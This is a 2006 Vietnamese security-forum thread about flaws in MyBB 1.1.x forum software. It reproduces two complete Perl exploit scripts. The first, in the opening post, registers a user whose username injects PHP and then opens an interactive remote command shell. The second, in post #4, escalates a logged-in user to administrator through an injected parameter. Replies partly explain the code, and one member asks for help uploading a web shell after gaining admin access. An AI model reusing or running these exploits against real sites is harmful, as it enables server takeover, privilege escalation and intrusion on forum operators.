banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Improper user validation allows attackers to execute PHP code in myBB  XML
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 21/06/2006 08:15:54 (+0700) | #1 | 563
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
http://www.mybboard.com/ MyBB is a powerful, efficient and free forum package developed in PHP and MySQL.

Improper user validation allows attackers to execute PHP code in myBB.

Vulnerable Systems: MyBB version 1.1.2

Exploit:
Code:
#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 <a href="mailto:jolascoaga@514.es">jolascoaga@514.es</a>
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok,
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
#   for debugging.
# - After you have created the exploit or if you have a valid non common
#   user, you can execute shell commands.
#
# TIPS:
#  * Sometimes you have to change the thread Id, --tid is your friend ;)
# * Don't forget to change the email. You MUST activate the account.
# * Mejor karate aun dentro ti.
#
# LIMITATIONS:
# * If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'       => \$host,
  'dir=s'       => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug,
  '1'        => \$first_time,
  'tid=s'       => \$tid,
  'delete'       => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
 $host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
  login() if !$logged;

  print "mybibi> "; # lost connection
  while(<STDIN>) {
    $command=$_;
    chomp($command);
    last;
  }
  &send($command);
}

sub send  {
 chomp (my $cmd = shift);
 my $h = $host.$dir."/newthread.php";
 my $req = POST $h, [
  'subject' => '514',
  'message' => '/slap 514',
  'previewpost' => 'Preview Post',
  'action' => 'do_newthread',
  'fid' => $tid,
  'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
 ];
 $req->header($uservar => $cmd);
 print $req->as_string() if $debug;
 my $res = $ua->request($req);
 if ($res->content =~ /You may not post in this/) {
  print "[!] don't have perms to post. Change the Forum ID\n";
 } else {
  my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
  print $data;
 }

}
sub login {
 my $h  = $host.$dir."/member.php";
 my $req = POST $h,[
  'username' => $username,
  'password' => $password,
  'submit' => 'Login',
  'action' => 'do_login'
 ];
 my $res = $ua->request($req);
 if ($res->content =~ /You have successfully been logged/is) {
  print "[*] Login succesful!\n";
  $logged = 1;
 } else {
  print "[!] Error login-in\n";
 }
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
 # firs we need to get the img.
 my  $h = $host.$dir."/member.php";
 print "Host: $h\n";

 $req = HTTP::Request->new (GET => $h."?action=register");
 $res = $ua->request ($req);

 my $req = POST $h, [
  'action' => "register",
  'agree' => "I Agree"
 ];
 print $req->as_string() if $debug;
 $res = $ua->request($req);

 my $content = $res->content();
 $content =~ m/.*(image\.php\?action.*?)\".*/is;
 my $img = $1;
 my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
 $res = $ua->request ($req);
 print $req->as_string();

 if ($res->content) {
  open (TMP, ">/tmp/file.png") or die($!);
  print TMP $res->content;
  close (TMP);
  print "[*] /tmp/file.png created.\n";
 }

 my ($hash) = $img =~ m/hash=(.*?)$/;
 my $img_str = get_img_str();
 unlink ("/tmp/file.png");
 $img_str =~ s/\n//g;
 my $req = POST $h, [
  'username' => $username,
  'password' => $password,
  'password2' => $password,
  'email' => $email,
  'email2' => $email,
  'imagestring' => $img_str,
  'imagehash' => $hash,
  'allownotices' => 'yes',
  'receivepms' => 'yes',
  'pmpopup' => 'no',
  'action' => "do_register",
  'regsubmit' => "Submit Registration"
 ];
 $res = $ua->request($req);
 print $req->as_string() if $debug;

 open (OUT, ">mybibi_out.html");
 print OUT $res->content;

 print "Check $email for confirmation or mybibi_out.html if there are some 
error\n";
}

sub get_img_str ()
{
 print "\nNow I need the text shown in /tmp/file.png: ";
 my $str = <STDIN>;
 return $str;
}
exit 0;

# EoF
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 26/06/2006 23:41:36 (+0700) | #2 | 986
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]
em đọc đoạn code exploite na`y , em vẫn chưa hiểu gì cả nhờ anh conmale nói kĩ về bug của loại forum này được không ạ ? cảm ơn anh nhiều.
[Up] [Print Copy]
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 27/06/2006 00:07:17 (+0700) | #3 | 1001
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

lonely_Xorhandsome wrote:
em đọc đoạn code exploite na`y , em vẫn chưa hiểu gì cả nhờ anh conmale nói kĩ về bug của loại forum này được không ạ ? cảm ơn anh nhiều. 


Vậy điều em cần làm trước là nghiên cứu Perl căn bản đã.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 27/06/2006 00:14:15 (+0700) | #4 | 1007
[Avatar]
DaoDuyHieu
HVA Friend

Joined: 14/04/2004 00:32:37
Messages: 200
Location: MICROSOFT
Offline
[Profile] [PM] [Email] [Yahoo!] [MSN]
Và đây nữa :
Code:
#!/usr/bin/perl
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;
 
 print q(
 ###########################################################
 # MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n"; 
  exit();
 }
 
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";


   
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'member.php',
 Content => [
 "action"   => "do_login",
 "username"   => "$uname",
 "password"   => "$passwd",
 "submit"      => "Login",
 ],);
 
 if($cookie_jar->as_string =~ /mybbuser=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  exit(); 
  }
 
$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]


Great hopes make great men smilie
[Up] [Print Copy]
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 27/06/2006 05:21:47 (+0700) | #5 | 1154
[Avatar]
dinhcaohack
Member

[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
==
Cái code ở dưởi chắc là explot lên quyền smilie qua
usercp.php?action=do_options&showcodebuttons=1
nâng quyền lên group 4 (group admin )
==
Cái code ở trên thì đầu tiên, ta có 1 u/p để send lên MyBB 1 topic mới như sau :
'subject' => '514',
'message' => '/slap 514',
'previewpost' => 'Preview Post',
'action' => 'do_newthread',
'fid' => $tid,
'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'

rồi up tiếp cái file ảnh thì phải (file.png) -> /tmp/file.png
P/S: cái sau có vẻ khó hiểu và khó exploit hơn
smilie
[Up] [Print Copy]
  [Question]   Improper user validation allows attackers to execute PHP code in myBB 27/06/2006 07:23:24 (+0700) | #6 | 1223
Tinoo
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 20:18:43
Messages: 3
Offline
[Profile] [PM]
Vô dc ACP, tìm cách up shell nhưng ko dc, các pro bit chỉ em. Thx
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|